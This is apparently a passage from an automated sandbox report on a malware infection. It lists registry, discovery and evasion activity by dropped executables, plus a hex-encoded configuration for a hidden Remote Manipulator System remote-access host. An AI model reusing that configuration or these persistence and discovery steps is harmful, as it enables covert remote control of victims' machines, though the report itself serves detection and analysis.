Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\888.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\curl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\jy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000a47b29fbd6f9c3720000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000a47b29fb0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff000000000700010000680900a47b29fb000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1da47b29fb000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000a47b29fb00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\WerFault.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\wmic.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\system32\wbem\wmiprvse.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\system32\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\SysWOW64\WerFault.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\WerFault.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\SysWOW64\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TektonIT C:\Windows\SysWOW64\regedit.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223730313230223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e5275737369616e3c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3661766a766755477a614d3d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e66616c73653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e66616c73653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e66616c73653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c6c6f675f7573655f77696e646f77733e66616c73653c2f6c6f675f7573655f77696e646f77733e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e5167413341444141526741774145494152414247414559414f41417a414445414e674242414545414e41417a41454d4152414132414551414f514131414559415251424341446b414e674179414545414f414134414430414e414130414451414e414130414334414e414178414451414e41417a414449414f414133414441414e41413d3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343538362e363131393838353138353c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349334d4445794d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e66616c73653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c636c6970626f6172645f7472616e736665725f6d6f64653e303c2f636c6970626f6172645f7472616e736665725f6d6f64653e3c636c6f73655f73657373696f6e5f69646c653e66616c73653c2f636c6f73655f73657373696f6e5f69646c653e3c636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e36303c2f636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e3c73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e66616c73653c2f73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e3c2f67656e6572616c5f73657474696e67733e0d0a C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters C:\Windows\SysWOW64\regedit.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A12D8F7C-D7F5-483B-B90C-BCC15D5FB2ED}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@C:\Windows\system32\ieframe.dll,-5723 = "The Internet" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\dllhost.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\TektonIT\Remote Manipulator System\Host\Parameters C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\FUSClientPath = "C:\\Windows\\SysWOW64\\ruts\\rfusclient.exe" C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\ruts\rutserv.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1734027696" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\a\RMX.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" C:\Windows\system32\sihost.exe N/A

Modifies registry key

